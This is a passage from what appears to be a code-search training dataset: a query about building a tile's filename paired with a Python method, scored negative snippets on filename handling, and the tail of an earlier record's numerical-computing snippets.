(states.face.x.num_flux.hu[:, :-1] - states.face.x.num_flux.hu[:, 1:]) / grid.x.delta + \\\n (states.face.y.num_flux.hu[:-1, :] - states.face.y.num_flux.hu[1:, :]) / grid.y.delta + \\\n states.src.hu\n\n states.rhs.hv = \\\n (states.face.x.num_flux.hv[:, :-1] - states.face.x.num_flux.hv[:, 1:]) / grid.x.delta + \\\n (states.face.y.num_flux.hv[:-1, :] - states.face.y.num_flux.hv[1:, :]) / grid.y.delta + \\\n states.src.hv\n\n # remove rounding errors\n states.rhs = remove_rounding_errors(states.rhs, runtime.tol)\n\n # obtain the maximum safe dt\n amax = nplike.max(nplike.maximum(states.face.x.plus.a, -states.face.x.minus.a))\n bmax = nplike.max(nplike.maximum(states.face.y.plus.a, -states.face.y.minus.a))\n max_dt = min(0.25*grid.x.delta/amax, 0.25*grid.y.delta/bmax)\n\n return states, max_dt", "def gradFun(self, S, x):", "def evaluate(self, eval_data, eval_labels, eval_input_fn):\n raise NotImplementedError(\"Method must be implemented by subclass\")", "def forward_2D_self_eval(self, grid_h, grid_w, pts_2, pts_ell, per_point=False, return_pdf=True):\n if isinstance(pts_2, torch.Tensor):\n pts_2 = [pts_2[i] for i in range(pts_2.shape[0])]\n\n ### number of points in each point cloud in the batch\n n_pts_2 = [None] * len(pts_2)\n ### preserve the x y dim\n for ib in range(len(pts_2)):\n pts_2[ib] = pts_2[ib][:, :2]\n n_pts_2[ib] = pts_2[ib].shape[0]\n\n ### construct ells (need to normalize to 
the number of points in each point cloud)\n pts_ells_2 = [None] * len(pts_2)\n for ib in range(len(pts_2)):\n sigma_x = torch.ones_like(pts_2[ib][:,0]) * pts_ell\n sigma_y = torch.ones_like(sigma_x) * pts_ell\n rho_xy = torch.zeros_like(sigma_x)\n weight = torch.ones_like(sigma_x) / n_pts_2[ib] # normalize\n pts_ells_2[ib] = torch.stack([sigma_x, sigma_y, rho_xy, weight], dim=0) # 4*N\n \n ### construct uvb for pts_2\n pts_uvb_2 = []\n for ib in range(len(pts_2)):\n pts_uv_2_ib = pts_2[ib].round().to(dtype=int)\n pts_uvb_2_ib = torch.cat([pts_uv_2_ib, torch.ones_like(pts_uv_2_ib[:,[0]])*ib], dim=1) # N*3 \n pts_uvb_2.append(pts_uvb_2_ib)\n pts_uvb_cat_2 = torch.cat(pts_uvb_2, dim=0) # BigN * 3\n pts_uvb_cat_2_split = torch.split(pts_uvb_cat_2, 1, 1)\n pts_uvb_cat_2 = pts_uvb_cat_2.transpose(0,1).unsqueeze(0) # 1*3*N\n\n ### flattening pts_2\n pts_cat_2 = torch.cat(pts_2, dim=0).transpose(0,1).unsqueeze(0) # 1*2*N\n pts_cat_2 = pts_cat_2[:,:2]\n # if pts_ells_2 is not None:\n # pts_ells_cat_2 = torch.cat(pts_ells_2, dim=1).unsqueeze(0) # 1*4*N\n \n ### griding pts_2\n grid_shape = (len(pts_2), 2, grid_h, grid_w)\n pts_grid_2 = grid_from_concat_flat_func(pts_uvb_cat_2_split, pts_cat_2, grid_shape)\n\n mask_cat_2 = torch.ones_like(pts_cat_2[:,[0]]).to(dtype=torch.bool)\n grid_mask_shape = (len(pts_2), 1, grid_h, grid_w)\n mask_grid_2 = grid_from_concat_flat_func(pts_uvb_cat_2_split, mask_cat_2, grid_mask_shape)\n\n ### griding ells_2\n pts_ells_cat_2 = torch.cat(pts_ells_2, dim=1).unsqueeze(0) # 1*4*N\n pts_ells_cat_2 = pts_ells_cat_2[:, :4]\n grid_ells_shape = (len(pts_2), 4, grid_h, grid_w)\n pts_ells_grid_2 = grid_from_concat_flat_func(pts_uvb_cat_2_split, pts_ells_cat_2, grid_ells_shape)\n\n ### convert dtype\n pts_uvb_cat_2 = pts_uvb_cat_2.float()\n\n ### pts_2 is flat, pts_2 is grid (output 1*NN*N, where N is # of pts in flat) \n inp = PtSampleInGridSigmaGrid.apply(pts_uvb_cat_2.contiguous(), pts_cat_2.contiguous(), pts_ells_grid_2.contiguous(), pts_grid_2.contiguous(), mask_grid_2.contiguous(), self.opts.neighbor_range, False, return_pdf)\n # inp = PtSampleInGrid.apply(pts_uvb_cat_2.contiguous(), pts_cat_2.contiguous(), pts_grid_2.contiguous(), mask_grid_2.contiguous(), self.opts.neighbor_range, pts_ell, False, True, 0, return_pdf)\n inp = inp / (2*np.pi)\n\n inp = inp.sum(dim=1)\n\n if per_point:\n return inp\n else: \n ### select the covered points\n inp = inp[inp>0]\n # ### set a minimum for inp\n # inp = torch.clamp(inp, min=1e-7)\n\n ### harmonic mean\n nel = inp.numel()\n inp_sum = 1 / ((1 / inp).mean()) \n inp_sum = inp_sum * nel\n # ### log likelihood\n # inp_sum = torch.log(inp).sum()\n\n return inp_sum", "def IterateValues(self):\n agrid = self.agrid\n self.w = self.setwage(self.K, self.N)\n self.r = self.setrate(self.K, self.N)\n self.b = self.benefit(self.N)\n\n for l in range(self.Na): \n self.c[-1][l] = agrid[l]*(1+self.r) + self.b\n self.v[-1][l] = self.util(self.c[-1][l],0)\n self.vtilde[-1] = interp1d(agrid,self.v[-1], kind='cubic')\n\n for y in range(-2,-(self.T+1),-1): # y = -2, -3,..., -60\n m0 = 0 \n for l in range(self.Na):\n # Find a bracket within which optimal a' lies\n m = max(0, m0-1)\n m0, a, b, c = self.GetBracket(y, l, m, agrid)\n # Define objective function for optimal a'\n def objfn(a1):\n v = self.value(y, agrid[l], a1)\n return -v\n # Find optimal a' using Golden Section Search\n if a == b:\n self.a[y][l] = 0\n elif b == c:\n self.a[y][l] = agrid[-1]\n else:\n result = minimize_scalar(objfn, bracket=(a,b,c), method='Golden')\n 
#‘Brent’,‘Bounded’,‘Golden’\n self.a[y][l] = result.x\n # Computing consumption and labor\n if y >= -self.R:\n self.c[y][l], self.n[y][l] = (1+self.r)*agrid[l] + self.b - self.a[y][l], 0\n else:\n self.c[y][l], self.n[y][l] = self.solve(agrid[l], self.a[y][l])\n self.v[y][l] = self.util(self.c[y][l],self.n[y][l]) + self.beta*self.vtilde[y+1](self.a[y][l])\n self.vtilde[y] = interp1d(agrid, self.v[y], kind='cubic')", "def __call__(self, X, Y=None, eval_gradient=False):\n list_pfunc = self._get_one_param('list_func')\n if(Y is None):\n Y =X\n for f in reversed(list_pfunc):\n X = f(X, Y=Y, eval_gradient=False)\n return X", "def run(self, functions, x, weights=None):\n for f in functions:\n self.check_compatibility(f, self.INTERFACES)\n\n num = len(functions)\n\n if weights is None:\n weights = [1.0 / float(num)] * num\n\n x_new = x_old = x\n p = [0.0] * len(functions)\n z = [0.0] * len(functions)\n for i in xrange(num):\n z[i] = np.copy(x)\n\n for i in xrange(1, self.max_iter + 1):\n\n for i in xrange(num):\n p[i] = functions[i].proj(z[i])\n\n # TODO: Does the weights really matter when the function is the\n # indicator function?\n x_old = x_new\n x_new = np.zeros(x_old.shape)\n for i in xrange(num):\n x_new += weights[i] * p[i]\n\n for i in xrange(num):\n z[i] = x + z[i] - p[i]\n\n if maths.norm(x_new - x_old) / maths.norm(x_old) < self.eps \\\n and i >= self.min_iter:\n break\n\n return x_new", "def Gravel(N, sigma2, R, f_def, params):\n\n # pull out algorithm-specific parameters\n max_iter = params['max_iter']\n tol = params['tol']\n\n # evolution\n if 'evolution' in params:\n evolution = params['evolution']\n evolution_list = []\n\n # initalize\n iteration = 0\n f = f_def\n N0 = np.sum(R * f, axis=1)\n\n # begin iteration\n while iteration < max_iter and norm(N0 - N, ord=2) > tol:\n\n # print info\n message = 'Iteration {}: Error {}'.format(iteration, norm(N0 - N, ord=2))\n print(message)\n\n # add evolution\n if evolution:\n evolution_list.append(f)\n\n # break down equations into simpler terms\n a = (R * f)\n b = np.sum(R * f, axis=1)\n c = (N**2 / sigma2)\n log_term = np.log(N / b)\n\n # compute the uper and lower portion of the exponential\n top = np.sum((((a.T / b) * c) * log_term).T, axis=0)\n bot = np.sum(((a.T / b) * c).T, axis=0)\n\n # compute the coefficient array\n coef = np.exp(top / bot)\n\n # update the new f\n f = f * coef\n\n # update f\n N0 = np.sum(R * f, axis=1)\n iteration += 1\n\n # print info\n message = 'Final Iteration {}: Error {}'.format(iteration, norm(N0 - N, ord=2))\n print(message)\n\n # add evolution\n if evolution:\n evolution_list.append(f)\n return f, evolution_list\n\n return f" ]
[ "0.62774193", "0.62126994", "0.6181909", "0.6074451", "0.6043692", "0.6043692", "0.6038648", "0.60327077", "0.59558785", "0.58665967", "0.58031106", "0.5786653", "0.57752985", "0.5758363", "0.5745993", "0.57132185", "0.57118523", "0.56945556", "0.56928897", "0.56743944", "0.5671344", "0.5625627", "0.56111604", "0.5606437", "0.55856377", "0.5584949", "0.5568414", "0.5563865", "0.55502737", "0.5526141", "0.551366", "0.5511965", "0.5508803", "0.54978627", "0.54926145", "0.5490521", "0.5483158", "0.54692", "0.5460595", "0.5454594", "0.54400986", "0.54322684", "0.5413122", "0.54093045", "0.5405992", "0.5398796", "0.53961563", "0.5394355", "0.5389591", "0.5385932", "0.538081", "0.537892", "0.53671664", "0.5366368", "0.5352174", "0.53343904", "0.53310186", "0.5307141", "0.53061867", "0.5303971", "0.52955145", "0.5282168", "0.52806234", "0.52789956", "0.52782774", "0.5277873", "0.5277288", "0.52735907", "0.5269207", "0.52621377", "0.52605283", "0.52575004", "0.5250245", "0.5246358", "0.5245642", "0.5242143", "0.52238554", "0.5210534", "0.5210112", "0.52061117", "0.52056766", "0.5205027", "0.52014107", "0.51937526", "0.5187199", "0.51864105", "0.5184707", "0.51837254", "0.51767486", "0.5176287", "0.5172477", "0.51723164", "0.51673615", "0.51666117", "0.51649755", "0.5163784", "0.5163481", "0.5160783", "0.5156951", "0.51563036", "0.51521665" ]
0.0
-1
Strip path and extension. Return base filename.
def basename(self):
    return get_basename(self.filename)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def filename_strip_ext(filename):\n base = os.path.basename(filename)\n # Strip file extension\n return os.path.splitext(base)[0]", "def get_filename(file_path):\n\n # Get rid of directories and etc\n just_file = os.path.basename(file_path)\n\n # Now we return just the base name\n return os.path.splitext(just_file)[0]", "def get_file_name_with_ext(path: str) -> str:\n return os.path.basename(path)", "def strip_path(path):\n name_re = re.compile(\"[^/]*\\.([a-z]+)$\")\n return name_re.search(path).group(0)", "def strip_extension(filename):\n return filename.rsplit('.',1)[-2]", "def get_fileext(file_path):\n\n # Get rid of directories and etc\n just_file = os.path.basename(file_path)\n\n # Now we return just the base name\n return os.path.splitext(just_file)[1]", "def filepath_without_ext(filepath: str) -> str:\n return str(pathlib.Path(filepath).with_suffix(''))", "def getfilename(path):\r\n return path.split('\\\\').pop().split('/').pop().rsplit('.', 1)[0]", "def base_filename(self):\n return self.filename.split('.')[0]", "def basename(file_path: str, extension: bool = False):\n file_name = os.path.basename(file_path)\n if not extension:\n file_name, *_ = file_name.split(\".\")\n return file_name", "def clear_ext(x):\r\n return os.path.splitext(os.path.basename(x))[0]", "def name_sans_ext(self) -> str:\n return os.path.splitext(self.path)[0]", "def clean_file_path(path):\r\n\r\n return path.split(\"/\")[-1]", "def get_filename(path):\n return path.split('/')[-1]", "def basename_sans(path):\n return os.path.splitext(os.path.basename(path))[0]", "def clean_filename(file):\r\n\r\n return file.split('.')[0]", "def strip_path(fpath):\n if not fpath:\n return fpath\n try:\n file_path, file_name = os.path.split(fpath)\n except Exception:\n file_name = fpath\n return file_name", "def basefname(fname):\n return os.path.splitext(fname.split(\"\\\\\")[-1])[0]", "def get_base_name(path):\n return os.path.basename(path).split('.')[0]", "def file_name(path):\n return os.path.basename(path).split('.')[0]", "def get_file_name(path: str) -> str:\n return os.path.splitext(os.path.basename(path))[0]", "def path_extension(self):\r\n return self.path.split('/')[-1].split('.')[-1]", "def filename_from_path(filepath: str) -> str:\n return filepath.split(\"/\")[-1]", "def filePathToFileName(path):\n return os.path.splitext(os.path.basename(path))[0]", "def get_full_path(file_extension=True) -> str:\n return get_directory() + \"/\" + get_filename(file_extension=file_extension)", "def base_name(path):\n return os.path.basename(path)", "def base_name(self):\n return \".\".join(posixpath.basename(self.file_name).split(\".\")[:-1])", "def get_file_name(file_path):\n full_file_name = file_path.split(os.sep)[-1]\n file_name = full_file_name.split(\".\")[0]\n return file_name", "def getInputFileBasenameNoSuffix():\n\n inputFileBasename = getInputFileBasename()\n basenameRemovedSuffix = removeSuffix(inputFileBasename)\n return basenameRemovedSuffix", "def basename(path):\n\n return path.rpartition(\"/\")[2]", "def filename(self):\n filename, ext = os.path.splitext(self.file.name)\n return filename.split('/')[-1]", "def extract_file_name(file_path):\n # ファイルパスからファイル名(拡張子含む)を取り出す\n file_name = file_path.split('/')[-1]\n # 拡張子を取り除く\n return file_name.split('.')[0]", "def path_filename_representation(path):\n # Strip leading / and replace / with .\n return re.sub(r\"^/(.*)$\", r\"\\1\", path).replace(\"/\", \".\")", "def file_title(self):\n basename = os.path.basename(self.__path)\n index_dot = basename.rfind(\".\")\n if 
index_dot == 0:\n return basename[1:]\n return basename if index_dot < 0 else basename[:index_dot]", "def just_the_name(path):\n return os.path.splitext(os.path.basename(path))[0]", "def remove_extension(path):\n for extension in EXTENSIONS:\n path = path.replace(\".%s\" % extension, \"\")\n return path", "def basename(path):\r\n return split(path)[1]", "def split_path(path):\n #drop file extension\n filename = path.rsplit('.', 1)[0]\n #drop static/img/\n filename = filename[11:]\n return filename", "def basename(path):\r\n return path.replace(\"\\\\\", \"/\").split(\"/\")[-1]", "def basename(path: str) -> str:\n pass", "def _getFileExtension( filepath ):\r\n file = os.path.splitext(filepath.lower())\r\n if len( file ):\r\n return file[1].replace( '.', '' )\r\n else:\r\n return filepath", "def filepath_name_only(filepath: str) -> str:\n return pathlib.Path(filepath).stem", "def get_file_name(path):\n return os.path.basename(path)", "def strip_path(self):\n return self.path.replace('/', '')", "def get_filename(self):\n name, ext = self.fkit.filename.rsplit('.', 1)\n if self._field.extension():\n ext = self._field.extension()\n return '.'.join((name, ext))", "def isolate_path_filename(self, uri, api_base=None):\n # Did we get an api_base\n api_base = api_base if api_base else self.api_base\n\n # Look for the part after the api_base\n url_parse = uri.lower().rpartition(api_base)\n\n # Take everything to the right of the api_base\n file_component = url_parse[2]\n\n # Remove any URL ? parameters\n if '?' in file_component:\n file_component = file_component.rpartition('?')[0]\n\n #: Remove URL encoding\n file_component = unquote(file_component)\n\n #: Remove any spaces in the filename\n file_component = file_component.replace(' ','')\n\n return file_component", "def basename(file_path):\n return os.path.basename(file_path)", "def getFilename(path):\n\tfrom os.path import split\n\tpath = normalizePath(path)\n\treturn split(path)[1]", "def _get_ext(self, path):\n return os.path.splitext(path)[1][1:]", "def get_file_extension(fpath):\n return str(fpath).split(\".\")[-1]", "def get_filename(file_extension=False) -> str:\n if file_extension == False:\n return filename[0:filename.find(\".json\")]\n else:\n return filename", "def purebasename(self):\n return self._getbyspec(\"purebasename\")[0]", "def purebasename(self):\n return self.namebase", "def get_extension(filename: str) -> str:\n return Path(filename).suffix[1:]", "def get_name_from_path(self, file_path, replace=False):\n\n if replace:\n base_name = os.path.basename(file_path)\n ext = os.path.splitext(base_name)[1]\n _out = base_name.replace(ext, '')\n return _out\n\n head, tail = os.path.split(file_path)\n return tail or os.path.basename(head)", "def _get_extension_from_string(path):\n file_name_parts = os.path.basename(path).split('.')\n if len(file_name_parts) == 1: # no periods in file name\n return ''\n if len(file_name_parts) > 2: # two or more periods in file name\n return '.'.join(file_name_parts[-2:])\n return file_name_parts[-1] # one period in file name", "def filter_pathbase(val: Optional[str]) -> str:\n return os.path.basename(val or '')", "def GetBase(self, fname, suffix):\n wds = fname.split('/')\n suff = suffix.replace('.BRIK','')\n suff = suff.replace('.HEAD','')\n if len(wds) > 1:\n return '.../%s' % '/'.join(wds[-2:]) + suff\n else:\n return fname + suff", "def getFileName(filepath):\n return os.path.splitext(os.path.basename(filepath))[0]", "def get_file_extension(file_path):\n _ext = os.path.splitext(file_path)[-1]\n if 
_ext:\n return _ext[1:] if _ext.startswith('.') else _ext\n else:\n return \"\"", "def get_filename(filepath):\n return os.path.basename(filepath)", "def file_ext(path):\n result = os.path.splitext(path)[1]\n return result", "def basename(self, filename):\n return filename.replace(self.remote_path, '', 1).lstrip(sep)", "def get_file_basename(self):\n return self._basename[:]", "def get_filename(self) -> str:\n fname = self.url.split(\"/\")[-1]\n if \",\" in fname:\n _fname, _i = fname.split(\",\")\n _split_fname = _fname.split(\".\")\n _name = _split_fname[0]\n _extension = _split_fname[-1]\n return _name + _i + \".\" + _extension\n else:\n return fname", "def get_filename(img_path):\n filename = os.path.splitext(img_path)\n return os.path.basename(filename[0])", "def get_file_ext(path: str) -> str:\n return os.path.splitext(os.path.basename(path))[1]", "def get_file_name(file):\n return os.path.splitext(os.path.basename(file))[0]", "def filepath_ext(filepath: str) -> str:\n return pathlib.Path(filepath).suffix", "def get_scriptname(fname):\n base = os.path.basename(fname)\n res = os.path.splitext(base)[0]\n return res", "def get_basename(file: Union[str, FileStorage]) -> str:\n filename = _retrieve_filename(file)\n # split will split at the final part of the path(image.jpg) and everything\n # before it is at index 0\n return os.path.split(filename)[1]", "def name(self) -> str:\n if '/' in self.path.strip('/'):\n basename: str = os.path.basename(self.path)\n return basename\n return self.path", "def fextension(filename):\n filename = os.path.normpath(filename)\n return os.path.splitext(filename)[1]", "def extension_from_path(path):\n extension = path.split(\".\")[-1]\n return extension", "def get_filepath(image):\r\n extension = (len(image.split('/')[-1:][0]))\r\n return image[:-extension]", "def get_basename(absolute_file_path):\r\n return absolute_file_path.split('/')[-1]", "def base(self):\n return os.path.basename(self.path)", "def replace_ext(path, ext):\n if not ext.startswith(\".\"):\n ext = \".\" + ext\n root = os.path.splitext(path)[0]\n return root + ext", "def pathToFileName(self, path):\n\t\t# Find the path, and strip the leading slash.\n\t\tpath =urlparse.urlparse(self.path)[2].lstrip(\"/\")\n\t\t# Process url escape codes, and normalize the path.\n\t\tpath = os.path.normpath(urllib2.unquote(path))\n\t\t# normpath strips the last slash\n\t\tif os.path.isdir(path):\n\t\t\treturn path + '/'\n\t\telse:\n\t\t\treturn path", "def just_the_name(path):\n name = os.path.splitext(os.path.basename(path))[0]\n return name", "def noTrailingSlash(path):\n return path.split('/')[0]", "def filename_ext(filename):\n base = os.path.basename(filename)\n return os.path.splitext(base)[1][1:]", "def filter_pathname(val: Optional[str]) -> str:\n return os.path.splitext(os.path.basename(val or ''))[0]", "def getBaseName(filepath):\n return os.path.basename(filepath)", "def ext(self):\n import os, string\n (base,ext) = os.path.splitext(self.filename())\n if ext == '':\n return None\n else:\n return string.lstrip(ext, '\\.')", "def fixExt(ext):\n if not ext.startswith(\".\"):\n return \".{}\".format(ext)\n return ext", "def get_file_ext(self):\n return self.archive.url.split('.')[-1].lower()", "def filter_filename(self, fname):\r\n return os.path.basename(fname)", "def filepath_name_ext(filepath: str) -> str:\n return pathlib.Path(filepath).name", "def getFilenameExtension(path):\n return os.path.splitext(os.path.normcase(path))[1]", "def normalize_filename(url):\n fname = url.replace('file://', '')\n 
if os.sep != '/' and not os.path.exists(fname):\n fname = fname.lstrip('/')\n return fname", "def getDirectoryFilename(path):\n\tfrom os.path import splitext\n\tpath = normalizePath(path)\n\treturn splitext(path)[0]", "def get_file_ext(filename):\n p = pathlib.Path(filename)\n if len(p.suffixes) <= 1:\n return p.suffix\n elif p.suffixes[-2] in include_subexts:\n return ''.join(p.suffixes[-2:])\n else:\n return p.suffix", "def get_file_name(self):\n return self.path.name[6:]", "def path_show_ext(fullpath):\n tmp = os.path.splitext(fullpath)\n ext = tmp[1]\n p = tmp[0]\n while tmp[1] != '':\n tmp = os.path.splitext(p)\n ext = tmp[1] + ext\n p = tmp[0]\n\n path = os.path.dirname(p)\n if path == '':\n path = '.'\n base = os.path.basename(p)\n return path, base, ext", "def get_filename(filepath):\n return filepath.replace(\"{}\\\\\".format(RES_DIR), \"\")", "def fix_filename(self):\n if not self.remove_path:\n return\n self.filename = re.sub(\".+\\/\", \".../\", self.filename)", "def basename(self):\n return os.path.basename(self.filepath)", "def extract_dir_name(input_file):\r\n fname = PurePath(input_file).__str__()\r\n s = fname.split('.')\r\n name = '.'.join(s[:-1])\r\n return name", "def basename(self):\n return self._getbyspec(\"basename\")[0]" ]
[ "0.80113024", "0.7722132", "0.7642737", "0.7580186", "0.7531498", "0.74958444", "0.7461117", "0.72882116", "0.726376", "0.72585756", "0.7248201", "0.72440237", "0.7239742", "0.7233385", "0.7215656", "0.721015", "0.72061", "0.7173597", "0.7156511", "0.7147149", "0.7107287", "0.7099546", "0.70622176", "0.70616364", "0.6982735", "0.695597", "0.6949522", "0.6921622", "0.6913202", "0.6901259", "0.6895388", "0.6888045", "0.68749934", "0.68663746", "0.6865515", "0.68462056", "0.6839596", "0.6801944", "0.68016255", "0.67852485", "0.67792135", "0.6775378", "0.6774416", "0.6763617", "0.67192763", "0.66972464", "0.66917276", "0.6687669", "0.6686982", "0.66694206", "0.6665019", "0.6660274", "0.66554016", "0.6648614", "0.66439754", "0.6618102", "0.66139215", "0.66074085", "0.66031", "0.6598766", "0.659014", "0.65814316", "0.6575644", "0.6574195", "0.65731525", "0.6572223", "0.65682024", "0.65615886", "0.65428174", "0.653724", "0.6529534", "0.6520246", "0.6511237", "0.6510246", "0.6506867", "0.64933485", "0.64922786", "0.6488464", "0.647562", "0.6475524", "0.6469917", "0.6467192", "0.64612824", "0.6459893", "0.64508355", "0.6443977", "0.64415103", "0.6429956", "0.64272386", "0.64201933", "0.6418401", "0.6415635", "0.64115417", "0.6407491", "0.6394156", "0.6389523", "0.63879526", "0.63877285", "0.63765436", "0.6356971" ]
0.6472341
80
Construct and return a filename for this tile.
def generate_filename(
    self, directory=os.getcwd(), prefix="tile", format="png", path=True
):
    filename = prefix + "_{col:02d}_{row:02d}.{ext}".format(
        col=self.column, row=self.row, ext=format.lower().replace("jpeg", "jpg")
    )
    if not path:
        return filename
    return os.path.join(directory, filename)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def tilefilename(self, x, y, z):\n\n tileIndex = x + y * self.tierSizeInTiles[z][0] + self.tileCountUpToTier[z]\n return os.path.join(\"TileGroup%.0f\" % math.floor( tileIndex / 256 ),\n \"%s-%s-%s.%s\" % ( z, x, y, self.tileformat))", "def tilefilename(self, x, y, z):\n\n tileIndex = x + y * self.tierSizeInTiles[z][0] + self.tileCountUpToTier[z]\n return os.path.join(\"TileGroup%.0f\" % math.floor(tileIndex / 256),\n \"%s-%s-%s.%s\" % (z, x, y, self.tileformat))", "def create_file_name(self):\n # create a unique id for the file name\n index = self.helpers.alpha_uuid()\n\n filename = self.form['FieldStorage'][self.image_cid].filename\n extension = guess_extension(guess_type(filename)[0])\n return ( # concatenates the following data\n self.articleData.get('directory') + # directory\n '/' + # slash\n self.articleData.get('article_name') + # the article name\n '-' + # hyphen character\n index + # the id of the image\n extension\n )", "def filename(self):\n return '%s%s' % (self.identifier, self.extension)", "def get_filename(cls):\n return osp.join(cls.dir_location, *cls.file_path)", "def filename(self):\n return self.config.get('filename', self.id) + f'_{self.file_suffix}'", "def filename(self):\n translator = {ord(\" \"): \"_\", ord(\",\"): None}\n return f'{self._full_name.translate(translator)}.txt'", "def create_filename (self):\n\t\tassert self.__patient_name and self.__location_name, \"New filename could not be determined, one or more needed arguments is empty!\"\n\t\t_patient_name = self.__patient_name.split(' ')\n\t\t_patient_name.reverse()\n\t\t\n\t\treturn os.path.join(os.path.dirname(self.file._path), \"%s MR %s%s\" % (self.__location_name, ', '.join(_patient_name).upper(), self._file.extension))", "def filename(self):\n return TaskInfo._filename(self.id)", "def generate_file_name(entry):\n return str_for_file(u'{name}, {year}, {title}'.format(\n year=entry['year'],\n name=get_last_name(entry['author'][0]),\n title=entry['title']\n ))", "def get_file_name(self):\n return str(self.get_file())", "def get_filename(self) -> str:\n return self._filename", "def generateFileName(self):\n return 'Covid' + self.map_type + '.html'", "def generate_file_filename(instance, filename):\n return _generate_filename(instance, filename, 'photos')", "def _prettyfilename(self):\n return f'{self.title} ({self.subtype})'", "def file_name(id, title, kind=\"src\"):\n fn_template = conf.template_source_file_name\n if kind == \"tst\":\n fn_template = conf.template_test_file_name\n\n return fn_template.format(id=id, title=title.replace(\"-\", \"_\"))", "def construct_basename(self, row, obstime=None):\n _obstime = self.construct_obstime(row) if obstime is None else obstime\n tiso = time.Time(_obstime, format='isot')\n dtime = datetime.datetime.strptime(tiso.value, '%Y-%m-%dT%H:%M:%S.%f')\n return '{0}-{1}_{2}_{3}{4}'.format(self['filename'][row].split('.fits')[0],\n self['target'][row].replace(\" \", \"\"),\n self.spectrograph.camera,\n datetime.datetime.strftime(dtime, '%Y%m%dT'),\n tiso.value.split(\"T\")[1].replace(':',''))", "def makefilename(self):\n fp= (pathlib.Path(self.vr_folder).expanduser()/(time.strftime(self.vr_filename))).with_suffix('')\n fp.parent.mkdir(parents=True, exist_ok=True)\n print('files setup', str(fp))\n return fp", "def filename(self):\n _, tail = os.path.split(self.url)\n return self.folder + '/' + tail[:-4] + '/' + tail[:-3] + 'shp'", "def get_image_filename(self, filename):\n path = 'images/{folder}/{filename}'.format(\n folder=self.folder,\n filename=filename\n )\n return 
path", "def _filename(self, key):\n return os.path.join(self.root, key[:2], key)", "def out_filename(self, filetype, dir, format='old'):\n filename = self.filename(filetype=filetype, format=format)\n return Path(dir) / filename", "def temp_name(self, filename):\n if self.params.get('nopart', False) or filename == '-' or \\\n (os.path.exists(encodeFilename(filename)) and not os.path.isfile(encodeFilename(filename))):\n return filename\n return filename + '.part'", "def _get_filepath(self, name=None, use_timestamp=True):\n current_time = str(int(time.time()))\n if not name and not use_timestamp:\n raise Exception(\"Name or timestamp is required\")\n if name:\n self.fname = \"%s\" % name\n current_time = \"_%s\" % current_time\n if use_timestamp:\n self.fname = \"%s%s\" % (self.fname, current_time)\n if len(self.fname) > 0:\n self.fname = \"%s/%s.jpg\" % (self.picture_directory, self.fname)\n return self.fname", "def filename(self):\n if self.__filename__ is None:\n return _filename\n else:\n return self.__filename__", "def filename(self):\n # TODO(aron): write tests for this\n\n return os.path.basename(self.file_on_disk.name)", "def get_file_name(self):\n\n return \"%s - %s\" % (self.get_tags()[\"artist\"], self.get_tags()[\"title\"])", "def _getfilename(self):\n pass", "def get_filename(self):\n return self.__filename", "def name(self):\n return self._filename", "def filename_generate(image_class, size=12, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):\n\tnew_filename = time.strftime(\"%d-%m-%Y_\")\n\tnew_filename = new_filename + ''.join(random.choice(chars) for _ in range(size))\n\tnew_filename = new_filename + \"_P\" + str(image_class)\n\treturn new_filename", "def get_dest_name ( self ):\n return self.filename", "def _get_filename(self, type_: str, name: str) -> str:\n if not os.path.isdir(self._datadir):\n os.mkdir(self._datadir, mode=0o700)\n\n type_dir = os.path.join(self._datadir, type_)\n if not os.path.isdir(type_dir):\n os.mkdir(type_dir, mode=0o700)\n\n fn = os.path.join(type_dir, name) + '.yaml'\n return fn", "def filename(self):\n # type: () -> str\n return self._filename", "def get_filename(self):\n return self.filename", "def _prettyfilename(self):\n return f'{self.grandparentTitle} - {self.seasonEpisode} - {self.title}'", "def generate_image_filename():\n now = datetime.now().strftime('%a-%w-%b-%H:%M:%S')\n return 'CCTV_{0}.jpg'.format(now)", "def out_filename(self, filetype, format='old', dir=Location.OUT_DIR):\n filename = self.filename(filetype=filetype, format=format)\n # return Path(dir) / filename\n return filename", "def filename(self):\n # Just the name of the file\n filename = self.use_name\n if self.extension:\n filename = \"{0}.{1}\".format(self.use_name, self.extension)\n # Architecture sub-folder\n arch_folder_conf = spack.config.get(\"modules:%s:arch_folder\" % self.conf.name, True)\n if arch_folder_conf:\n # include an arch specific folder between root and filename\n arch_folder = str(self.spec.architecture)\n filename = os.path.join(arch_folder, filename)\n # Return the absolute path\n return os.path.join(self.dirname(), filename)", "def generate_file_name(self):\n self._session_iterator = None # New file invalidate old interator\n self._img_count += 1\n self._current_file = '{0}/frame_{1}.jpg'.format(self._relative_path,self._img_count)\n return self.current_file", "def _filename(task_id):\n return \"{}.json\".format(task_id)", "def get_filename(self):\n name, ext = self.fkit.filename.rsplit('.', 1)\n if self._field.extension():\n 
ext = self._field.extension()\n return '.'.join((name, ext))", "def gen_filename(self):\n expansion_string = '_'.join(sorted(args.exp)) if args.exp else 'noexp'\n return 'quad--{}--{}{}{}_{}{}_{}{}_{}{}{}{}{}_{}{}--{:02}_{:02}--{:02}_{:02}_{:02}_{:02}_{:02}_{:02}_{:02}_{:02}_{:02}--{}.log'.format(self.pts_total, hex(self.cnt_T)[-1:], self.cnt_S, self.cnt_U, self.cnt_P, self.cnt_G, self.cnt_F, self.cnt_A, self.cnt_1, self.cnt_2, self.cnt_3, self.cnt_4, self.cnt_5, hex(self.cnt_O)[-1:], self.cnt_M, self.popula, self.energy, self.pts_tower, self.pts_shop, self.pts_public, self.pts_park, self.pts_factory, self.pts_harbor, self.pts_office, self.pts_monument, self.pts_expansion, expansion_string)", "def _prettyfilename(self):\n return f'{self.title} ({self.year})'", "def _generate_filename(instance, filename, prefix):\n md5 = hashlib.md5()\n md5.update(struct.pack('f', time.time()))\n for chunk in instance.file.chunks():\n md5.update(chunk)\n extension = os.path.splitext(filename)[1]\n return os.path.join(prefix, md5.hexdigest() + extension)", "def _prettyfilename(self):\n return self.title", "def ftile(self):\n try:\n ftile = \"_\".join([self[\"grid_name\"], self[\"tile_name\"]])\n except TypeError:\n ftile = None\n return ftile", "def generate_grid_filename(grid, field, level, ext=\"png\"):\n name_s = generate_grid_name(grid).replace(\" \", \"_\")\n field_s = field.replace(\" \", \"_\")\n time_s = generate_grid_time_begin(grid).strftime(\"%Y%m%d%H%M%S\")\n level_s = 